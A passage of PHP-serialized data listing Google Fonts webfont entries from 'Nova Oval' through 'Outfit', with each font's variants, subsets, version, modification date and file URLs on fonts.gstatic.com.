Oval\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/novaoval/v24/jAnEgHdmANHvPenMaswCMY-h3cWkWg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1013;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Nova Round\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/novaround/v21/flU9Rqquw5UhEnlwTJYTYYfeeetYEBc.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1014;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Nova Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/novascript/v25/7Au7p_IpkSWSTWaFWkumvmQNEl0O0kEx.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1015;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Nova Slim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/novaslim/v24/Z9XUDmZNQAuem8jyZcn-yMOInrib9Q.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1016;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Nova Square\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/novasquare/v20/RrQUbo9-9DV7b06QHgSWsZhARYMgGtWA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1017;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Numans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/numans/v15/SlGRmQmGupYAfH8IYRggiHVqaQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1018;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Nunito\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";i:14;s:9:\"800italic\";i:15;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"200\";s:85:\"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDDshRTM9jo7eTWk.ttf\";s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDOUhRTM9jo7eTWk.ttf\";s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshRTM9jo7eTWk.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDIkhRTM9jo7eTWk.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDGUmRTM9jo7eTWk.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDFwmRTM9jo7eTWk.ttf\";s:3:\"800\";s:85:\"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDDsmRTM9jo7eTWk.ttf\";s:3:\"900\";s:85:\"http://fonts.gstatic.com/s/nunito/v25/XRXI3I6Li01BKofiOc5wtlZ2di8HDBImRTM9jo7eTWk.ttf\";s:9:\"200italic\";s:88:\"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiLXA3iqzbXWnoeg.ttf\";s:9:\"300italic\";s:88:\"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNi83A3iqzbXWnoeg.ttf\";s:6:\"italic\";s:88:\"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNirXA3iqzbXWnoeg.ttf\";s:9:\"500italic\";s:88:\"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNin3A3iqzbXWnoeg.ttf\";s:9:\"600italic\";s:88:\"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNic3c3iqzbXWnoeg.ttf\";s:9:\"700italic\";s:88:\"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiSnc3iqzbXWnoeg.ttf\";s:9:\"800italic\";s:88:\"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiLXc3iqzbXWnoeg.ttf\";s:9:\"900italic\";s:88:\"http://fonts.gstatic.com/s/nunito/v25/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiBHc3iqzbXWnoeg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1019;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Nunito Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc9yAv5qWVAgVol-.ttf\";s:9:\"200italic\";s:85:\"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4GxZrU1QCU5l-06Y.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc8WAf5qWVAgVol-.ttf\";s:9:\"300italic\";s:85:\"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4G3JoU1QCU5l-06Y.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/nunitosans/v12/pe0qMImSLYBIv1o4X1M8cfe6Kdpickwp.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/nunitosans/v12/pe0oMImSLYBIv1o4X1M8cce4I95Ad1wpT5A.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc9iB_5qWVAgVol-.ttf\";s:9:\"600italic\";s:85:\"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4GwZuU1QCU5l-06Y.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc8GBv5qWVAgVol-.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4G2JvU1QCU5l-06Y.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc8aBf5qWVAgVol-.ttf\";s:9:\"800italic\";s:85:\"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4G35sU1QCU5l-06Y.ttf\";s:3:\"900\";s:82:\"http://fonts.gstatic.com/s/nunitosans/v12/pe03MImSLYBIv1o4X1M8cc8-BP5qWVAgVol-.ttf\";s:9:\"900italic\";s:85:\"http://fonts.gstatic.com/s/nunitosans/v12/pe01MImSLYBIv1o4X1M8cce4G1ptU1QCU5l-06Y.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1020;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Nuosu SIL\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:2:\"yi\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-05-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:73:\"http://fonts.gstatic.com/s/nuosusil/v1/8vIK7wM3wmRn_kc4uAjeFGxbO_zo-w.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1021;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Odibee Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/odibeesans/v14/neIPzCSooYAho6WvjeToRYkyepH9qGsf.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1022;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Odor Mean Chey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/odormeanchey/v27/raxkHiKDttkTe1aOGcJMR1A_4mrY2zqUKafv.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1023;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Offside\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/offside/v20/HI_KiYMWKa9QrAykQ5HiRp-dhpQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1024;O:8:\"stdClass\":8:{s:6:\"family\";s:2:\"Oi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:5:\"tamil\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:58:\"http://fonts.gstatic.com/s/oi/v15/w8gXH2EuRqtaut6yjBOG.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1025;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Old Standard TT\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/oldstandardtt/v18/MwQubh3o1vLImiwAVvYawgcf2eVurVC5RHdCZg.ttf\";s:6:\"italic\";s:89:\"http://fonts.gstatic.com/s/oldstandardtt/v18/MwQsbh3o1vLImiwAVvYawgcf2eVer1q9ZnJSZtQG.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/oldstandardtt/v18/MwQrbh3o1vLImiwAVvYawgcf2eVWEX-dTFxeb80flQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1026;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Oldenburg\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/oldenburg/v20/fC1jPY5JYWzbywv7c4V6UU6oXyndrw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1027;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"Ole\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:60:\"http://fonts.gstatic.com/s/ole/v3/dFazZf6Z-rd89fw69qJ_ew.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1028;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Oleo Script\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/oleoscript/v14/rax5HieDvtMOe0iICsUccBhasU7Q8Cad.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/oleoscript/v14/raxkHieDvtMOe0iICsUccCDmnmrY2zqUKafv.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1029;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Oleo Script Swash Caps\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/oleoscriptswashcaps/v13/Noaj6Vb-w5SFbTTAsZP_7JkCS08K-jCzDn_HMXquSY0Hg90.ttf\";s:3:\"700\";s:106:\"http://fonts.gstatic.com/s/oleoscriptswashcaps/v13/Noag6Vb-w5SFbTTAsZP_7JkCS08K-jCzDn_HCcaBbYUsn9T5dt0.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1030;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Oooh Baby\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:73:\"http://fonts.gstatic.com/s/ooohbaby/v3/2sDcZGJWgJTT2Jf76xQDb2-4C7wFZQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1031;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Open Sans\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:9:\"300italic\";i:7;s:6:\"italic\";i:8;s:9:\"500italic\";i:9;s:9:\"600italic\";i:10;s:9:\"700italic\";i:11;s:9:\"800italic\";}s:7:\"subsets\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v34\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"300\";s:108:\"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsiH0C4nY1M2xLER.ttf\";s:7:\"regular\";s:108:\"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0C4nY1M2xLER.ttf\";s:3:\"500\";s:108:\"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjr0C4nY1M2xLER.ttf\";s:3:\"600\";s:108:\"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1y4nY1M2xLER.ttf\";s:3:\"700\";s:108:\"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsg-1y4nY1M2xLER.ttf\";s:3:\"800\";s:108:\"http://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgshZ1y4nY1M2xLER.ttf\";s:9:\"300italic\";s:111:\"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk5hkaVcUwaERZjA.ttf\";s:6:\"italic\";s:111:\"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkaVcUwaERZjA.ttf\";s:9:\"500italic\";s:111:\"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk_RkaVcUwaERZjA.ttf\";s:9:\"600italic\";s:111:\"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkxhjaVcUwaERZjA.ttf\";s:9:\"700italic\";s:111:\"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0RkyFjaVcUwaERZjA.ttf\";s:9:\"800italic\";s:111:\"http://fonts.gstatic.com/s/opensans/v34/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk0ZjaVcUwaERZjA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1032;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Oranienbaum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/oranienbaum/v15/OZpHg_txtzZKMuXLIVrx-3zn7kz3dpHc.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1033;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Orbitron\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyGy6xpmIyXjU1pg.ttf\";s:3:\"500\";s:90:\"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyKS6xpmIyXjU1pg.ttf\";s:3:\"600\";s:90:\"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyxSmxpmIyXjU1pg.ttf\";s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1ny_CmxpmIyXjU1pg.ttf\";s:3:\"800\";s:90:\"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nymymxpmIyXjU1pg.ttf\";s:3:\"900\";s:90:\"http://fonts.gstatic.com/s/orbitron/v25/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nysimxpmIyXjU1pg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1034;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Oregano\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/oregano/v13/If2IXTPxciS3H4S2kZffPznO3yM.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/oregano/v13/If2KXTPxciS3H4S2oZXVOxvLzyP_qw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1035;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Orelega One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/orelegaone/v10/3qTpojOggD2XtAdFb-QXZGt61EcYaQ7F.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1036;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Orienta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/orienta/v13/PlI9FlK4Jrl5Y9zNeyeo9HRFhcU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1037;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Original Surfer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/originalsurfer/v18/RWmQoKGZ9vIirYntXJ3_MbekzNMiDEtvAlaMKw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1038;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Oswald\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v49\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:85:\"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs13FvgUFoZAaRliE.ttf\";s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs169vgUFoZAaRliE.ttf\";s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs1_FvgUFoZAaRliE.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs18NvgUFoZAaRliE.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs1y9ogUFoZAaRliE.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/oswald/v49/TK3_WkUHHAIjg75cFRf3bXL8LICs1xZogUFoZAaRliE.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1039;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Outfit\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4TC0C4G-EiAou6Y.ttf\";s:3:\"200\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4bC1C4G-EiAou6Y.ttf\";s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4W61C4G-EiAou6Y.ttf\";s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4TC1C4G-EiAou6Y.ttf\";s:3:\"500\";s:84:\"http://fonts.gstatic.com/s/outfit/v6/QGYyz_MVcBeNP4NjuGObqx1XmO1I4QK1C4G-EiAou6Y